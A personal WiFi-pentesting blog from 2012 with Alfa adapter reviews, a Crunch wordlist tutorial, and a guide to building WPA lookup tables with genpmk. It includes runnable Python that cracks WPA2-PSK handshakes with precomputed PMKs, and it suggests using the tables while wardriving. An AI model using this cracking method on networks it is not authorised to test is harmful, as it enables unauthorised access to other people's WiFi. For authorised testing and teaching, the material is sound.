8/07/2012

"Big" unboxing!

After just 6 days, including weekends, I got all three things I ordered:

 - Alfa AWUS036NHA
 - Alfa carrying case
 - Alfa 9dBi antenna.


Let's roll!

ALFA AWUS036NHA

This is the box (Duh.)
It didn't include a mounting cup, though :-/

It has glossy paint, and the LED is blue. (The AWUS036H has a yellow LED.)

Next one!

9dBi Antenna

I must say, it is BIG! Almost 40cm! (That's what she said..)
So when you use it, you should lay the Alfa down or hold the antenna. Also, here is a comparison with the 5dBi antenna.

Another one!

ALFA Carry Case

They included a mounting cup, how nice. Now I have one for both of my Alfas.

The packaging for the case says it's waterproof, though I don't believe that.

The case feels very good in your hands and is very soft, so I think it will give good protection.


The carry case and the adapter itself I bought at the Rokland eBay store, for a total of $39.
The antenna I bought from the GigaCity eBay store for $9.99.

I recommend both these stores!



8/06/2012

Discovered some problems with the Aircrack-ng suite and Ubuntu 12.04

Since I already have Ubuntu on my laptop, I installed all the necessary tools to do my pentesting.
But when using airodump-ng I discovered that I never managed to capture a handshake. I thought to myself that I might just be unlucky, but after trying several computers and several wireless adapters with the same result, I posted a thread on HackForums, where one user replied with: "Have you tried in BackTrack?"

Luckily, my desktop computer had a VM with BackTrack, so I tried. And guess what? I got the handshake in the blink of an eye.

I asked around what the problem could be, and some answered it could be NetworkManager, which puts the wireless adapter back into managed mode, which means I can't listen to and capture the packets flowing through the air.

So I tried both killing and stopping NetworkManager, and it worked, once.
Then I said, screw this. I installed BackTrack in a VM and will deal with the problem some other time.

So if anybody has a solution for totally killing NetworkManager, hit me up in the comments ;-)

8/04/2012

Crunch!

Since I love how Crunch works, I will make a tutorial on how to use it :-)

To install it, download Crunch from http://sourceforge.net/projects/crunch-wordlist/ and build it:

cd /path/to/downloaded/archive
tar -xvf crunch_archive.tgz
cd /path/to/extracted/folder/
make && sudo make install

Troubleshooting:

If you get this error:
Building binary...
/usr/bin/gcc -Wall -lm -pthread -std=c99  crunch.c -o crunch
crunch.c: In function ‘PrintPercentage’:
crunch.c:1006:20: warning: variable ‘finall’ set but not used [-Wunused-but-set-variable]
crunch.c: In function ‘renamefile’:
crunch.c:1032:12: warning: variable ‘pidret’ set but not used [-Wunused-but-set-variable]
crunch.c: In function ‘main’:
crunch.c:1805:8: warning: variable ‘loaded’ set but not used [-Wunused-but-set-variable]
/tmp/ccqWIgti.o: In function `count_strings':
crunch.c:(.text+0x1c1e): undefined reference to `pow'
crunch.c:(.text+0x1dd5): undefined reference to `pow'
crunch.c:(.text+0x1fd1): undefined reference to `pow'
collect2: ld returned 1 exit status
make: *** [crunch] Error 1

Then the linker dropped the math library: on Ubuntu 12.04 the linker only keeps a library that is listed after the object files that need it, and the Makefile passes -lm before crunch.c, so pow() from libm stays unresolved. To fix it, compile crunch by hand with -lm at the end of the command:

/usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 crunch.c -o crunch -lm
[If you are on a 64-bit platform, change "-m32" to "-m64".]

Crunch generates a wordlist from a character set that you give it. For example:

./crunch 8 8 0123456789 -o 8Digit.lst

This launches Crunch and writes a wordlist named 8Digit.lst containing every 8-character word (minimum and maximum length are both 8) over the character set 0-9, i.e. 10^8 lines.


A neat little feature of Crunch is that before it starts it displays the number of words it will generate and how much space the wordlist will use, then waits 3 seconds, so if the wordlist is too big you can stop Crunch with Ctrl-C before it touches the disk.

Crunch has the following options:

-b  Maximum bytes to write per file, so using this option the wordlist to be created can be split into various
    sizes such as KB / MB / GB (must be used in combination with the "-o START" switch)
-c  Number of lines to write to the output file, must be used together with "-o START"
-d  Limits the number of consecutive identical characters (crunch v3.2)
-e  Specifies when crunch should stop early (crunch v3.1)
-f  Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst',
    to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space'
-i  Inverts the output sequence from left-to-right to right-to-left
    (so instead of aaa, aab, aac, aad etc., the output would be aaa, baa, caa, daa)
-l  When specifying custom patterns with the -t option, the -l switch allows you to identify which of the characters
    should be taken as a literal character instead of a place holder ( @,%^ )
-o  Allows you to specify the file name / location for the output, e.g. /media/flashdrive/wordlist.txt
-p  Prints permutations of the words or characters provided on the command line
-q  Prints permutations of the words or characters found in a specified file
-r  Resumes from a previous session; use the exact same syntax followed by -r
-s  Allows you to specify the starting string for your wordlist
-t  Allows you to specify a specific pattern to use. Probably one of the most important functions!
    Place holders for fixed character sets are:
    @   --  lower case alpha characters
    ,   --  upper case alpha characters
    %   --  numeric characters
    ^   --  special characters (including space)
-u  Suppresses the output of wordlist size & line count prior to starting wordlist generation
-z  Adds support to compress the generated output, supports gzip, bzip2 & lzma

If you are creating big wordlists, Crunch can also compress the output with gzip, bzip2 or lzma, e.g. for a 6-digit list:

./crunch 6 6 0123456789 -o 6Digit.lst -z lzma

Another neat feature is that you can pipe Crunch's output straight into another tool, for example aircrack-ng, which reads the wordlist from stdin when given -w -, so nothing has to be written to disk:

./crunch 8 8 0123456789 | aircrack-ng -e test -w - capture.cap
[Little picture fail here; I used the command mentioned above.]

This one is a little crazy :-P

To learn more about Crunch, in terminal, type "man crunch".
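To make the size maths and the -t placeholders concrete, here is an added example in Python, written for this page and not part of crunch itself. It re-implements the parts of crunch used above: the line and byte counts crunch prints before its 3-second pause, plain character-set generation, and -t pattern expansion. The special-character set behind ^ is an assumption, not copied from crunch's source.

```python
"""Added example (not crunch's own code): the size maths and -t pattern
expansion that the Crunch tutorial above relies on, in plain Python."""
import itertools
import string

# Same meaning as crunch -t placeholders: @ lower, , upper, % digits, ^ specials.
# The exact special-character set is assumed here; crunch's may differ slightly.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": " " + string.punctuation,
}


def wordlist_stats(min_len, max_len, charset):
    """Lines and bytes that crunch announces before it starts writing.

    Each word is followed by a newline, so an L-character word costs L+1 bytes.
    """
    n = len(charset)
    lengths = range(min_len, max_len + 1)
    lines = sum(n ** length for length in lengths)
    nbytes = sum(n ** length * (length + 1) for length in lengths)
    return lines, nbytes


def generate(min_len, max_len, charset):
    """Equivalent of: crunch MIN MAX CHARSET (lexicographic in charset order)."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def generate_pattern(pattern):
    """Equivalent of: crunch N N -t PATTERN with N = len(pattern).

    Literal characters are kept in place; placeholders expand to their set.
    """
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def pattern_count(pattern):
    """Number of words a -t pattern yields: product of each slot's size."""
    count = 1
    for ch in pattern:
        count *= len(PLACEHOLDERS.get(ch, ch))
    return count


def fits_on_disk(min_len, max_len, charset, free_bytes):
    """The check the 3-second pause exists for: is there room for the list?"""
    _, nbytes = wordlist_stats(min_len, max_len, charset)
    return nbytes <= free_bytes


if __name__ == "__main__":
    # The post's example: crunch 8 8 0123456789 -o 8Digit.lst
    lines, nbytes = wordlist_stats(8, 8, string.digits)
    print(f"8-digit list: {lines:,} lines, {nbytes:,} bytes")
    # A -t pattern with a fixed prefix and two digit slots
    for word in itertools.islice(generate_pattern("p@ss%%"), 3):
        print(word)
    print(pattern_count("p@ss%%"), "words for pattern p@ss%%")
```

Run with the post's 8-digit example it reports 100,000,000 lines and 900,000,000 bytes, the same figures crunch shows, so you can check a budget before starting. Feeding generate() line by line to a subprocess reading stdin is the equivalent of the aircrack-ng -w - trick above.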

8/03/2012

Alfa AWUS036H review.

So let's start.

The package contains:
 - The Alfa adapter.
 - USB cable, 1 m approximately.
 - 5dBi antenna.
 - A plastic mount cup.

The adapter looks like this with, and without, the mount cup:

I must say first, it is really lightweight. It's like there is nothing in your hands.

The build quality is okay, I guess. It has a plastic-ish feel to it, and I feel that if I drop it on the ground it will break, but what can you expect from an awesome adapter for $26?

So let's see its performance!

First, my internal Atheros chipset.

Now, with the Alfa AWUS036H.

I would say that the AWUS036H can do around 90 ft (30 m) in "terrain", by which I mean trees, bushes, walls etc.
But in clear line of sight it can probably do 120 ft (60 m), or 150 ft (70 m).

So overall, I'd say this is an awesome adapter at an awesome price. I like it because it is, as said above, lightweight and easy to handle, with good range and a stable chipset. It does have some downsides too: it feels kind of cheap and plasticky, and since the chipset does not have a heatsink it gets a little hot after a while. Despite those downsides it is worth $26, and it's awesome for everybody who is into networking and pentesting. Also, I recommend buying it at the Rokland store website (link on the side) or the Rokland eBay store (that's where I bought mine). Rokland is a certified Alfa distributor, so they are trusted.

And here are some more pictures:

It also fits perfectly on top of a laptop screen ;-)

(I will do a comparison on the 5dBi antenna and the 9dBi antenna when it arrives.)

8/02/2012

Alfa AWUS036NHA is coming soon

I've ordered an Alfa AWUS036NHA for myself. It's probably here in a week or something, I'll do an unboxing when it has arrived.

Wordlists!

Here are some wordlists (torrents):

27 rainbow tables: http://adf.ly/Amgn4
8 digit wordlist, with the characterset: 0-9: http://adf.ly/AmhH5
8 digit wordlist, with the characterset: 0-9, A-F, a-f: http://adf.ly/Amgxp
9 digit wordlist, with the characterset: 0-9: http://adf.ly/Amh2X
10 digit wordlist, with the characterset: 0-9: http://adf.ly/Amh5r
WiFoo-er's wordlists, cleaned up and 1337ified(in their own files): http://adf.ly/AneyW

How to generate rainbow tables for CoWPAtty/Pyrit

First a little lesson on lookup tables.

Dictionary attacks are a slow process.
Each candidate passphrase is run through PBKDF2-HMAC-SHA1 for 4096 iterations, salted with the ESSID, and the 256-bit output is the PMK (Pairwise Master Key); from the PMK the session keys are derived, and the resulting MIC is compared with the one in the captured key exchange (handshake).
My own laptop is able to do 450 PMK/s.

With a lookup table the PMK for every word has already been computed, so only the cheap per-handshake comparison is left, and the process is a LOT faster!
This all sounds great, huh? There has to be a catch.

And there is: the PMK is salted with the ESSID, so a table only works against networks with the exact ESSID you built it for. Therefore you should only make tables for common ESSIDs, as the time it takes to make one is wasted if it can only be used once.

The Church of WiFi has already made a big lookup table for the 1000 most commonly used ESSIDs, based on their own wordlist; that table can come in handy when wardriving, at an airport etc., so I recommend downloading it (link at the end of the guide).

But back to the guide.
(In my example I use the Church of WiFi's wordlists, plus some words I've added myself.)

You will need three things:
- Genpmk (included in coWPAtty package).
- A dictionary file.
- Time.

1. Open up a terminal and cd to the directory where your wordlist is placed (optional). In my example:

Code:
cd Desktop/

2. Use genpmk to generate the lookup table. In my example I am creating the table AndroidAPRainbowTable salted with ESSID AndroidAP, and the wordlist mentioned above.
Code:
genpmk -f RenderlabWordList.lst -s AndroidAP -d AndroidAPRainbowTable

-f is the dictionary file, -s the ESSID (SSID) and -d the output file.

Your terminal should look like this:
[Image: genpmkthread.png]

Now you'll have to wait. This will take some time, depending on how big your dictionary file is. genpmk is a single-threaded program, so it can't take advantage of all 8 cores of your fancy new 8-core CPU.

When it's done it should look something like this:
[Image: genpmkfinished.png]

When I was finished with this table, I used it against a handshake I captured from my phone's hotspot feature. In Pyrit (coWPAtty wouldn't accept my handshake) I got a whopping 720.000 PMK/s on the same laptop as I mentioned above, which means I walked through the dictionary in 1.5 seconds. Now, that's fast!

Source: http://www.renderlab.net/projects/WPA-tables/

Here is a script, and the 1000 most used SSIDs, for mass-generating tables: http://adf.ly/Ar5E4
You have to edit the script for the wordlist you are using: remove "./" in front of genpmk and replace "passwords2.txt" with your desired wordlist.
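To show why a table is tied to one ESSID and where the speed-up comes from, here is an added Python example written for this page; it is not genpmk, coWPAtty or Pyrit code. It computes the PMK the way 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 rounds, ESSID as salt), builds a word -> PMK table like genpmk does, and then tests candidates against a handshake using only the cheap PTK/MIC derivation. The handshake fields (MACs, nonces, EAPOL body) are constructed for the demo; the PMK for passphrase "password" on SSID "IEEE" is the standard's published test vector.

```python
"""Added example (not from the blog or the tools it mentions): WPA/WPA2-PSK
precomputation as genpmk does it, plus the per-handshake check that a
lookup table leaves to do. Handshake values below are constructed."""
import hashlib
import hmac
from typing import Optional

ITERATIONS = 4096   # PBKDF2 round count fixed by 802.11i
PMK_LEN = 32        # 256-bit Pairwise Master Key


def pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).

    The ESSID is the salt, which is why a table only works for one network name.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               ITERATIONS, PMK_LEN)


def build_table(wordlist, essid: str) -> dict:
    """The genpmk step: pay the 4096 rounds once per word, store word -> PMK."""
    return {word: pmk(word, essid) for word in wordlist}


def prf512(key: bytes, data: bytes) -> bytes:
    """802.11i PRF-512 with label 'Pairwise key expansion' (four HMAC-SHA1 blocks)."""
    out = b"".join(
        hmac.new(key, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck(pmk_bytes: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key = first 16 bytes of the PTK."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_bytes, data)[:16]


def eapol_mic(kck_bytes: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 truncated to 128 bits,
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck_bytes, eapol, hashlib.sha1).digest()[:16]


def crack_with_table(table: dict, hs: dict) -> Optional[str]:
    """Per candidate: PRF + one HMAC, no PBKDF2. That is the speed-up measured above."""
    for word, pmk_bytes in table.items():
        k = kck(pmk_bytes, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(k, hs["eapol"]), hs["mic"]):
            return word
    return None


def make_handshake(passphrase: str, essid: str) -> dict:
    """Constructed stand-in for a captured 4-way handshake (message 2 fields).

    MACs, nonces and the EAPOL body are made up; only the MIC is computed
    the way a real client would compute it from the passphrase and ESSID.
    """
    hs = {
        "ap": bytes.fromhex("001122334455"),
        "sta": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
        # EAPOL header (version 1, type 3 = Key, length 95) + zeroed body incl. MIC field
        "eapol": b"\x01\x03\x00\x5f" + bytes(95),
    }
    k = kck(pmk(passphrase, essid), hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(k, hs["eapol"])
    return hs


if __name__ == "__main__":
    print("PMK(password, IEEE) =", pmk("password", "IEEE").hex())
    hs = make_handshake("password", "IEEE")
    table = build_table(["letmein", "password", "qwerty123"], "IEEE")
    print("table for IEEE :", crack_with_table(table, hs))
    print("table for IEEE2:", crack_with_table(build_table(["letmein", "password"], "IEEE2"), hs))
```

With a real capture you would take the AP and client MACs, ANonce, SNonce, the EAPOL frame of message 2 with its MIC field zeroed, and the MIC itself from the pcap. Once the table exists each candidate costs four HMAC-SHA1 calls for the PRF and one for the MIC instead of 4096 rounds of PBKDF2, which is the gap between 450 PMK/s and hundreds of thousands. And because the ESSID sits inside the PBKDF2 salt, the table built for "IEEE2" finds nothing against the same handshake.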

Get ready!

First post. I've created this blog to make networking and pentesting easier. Enjoy!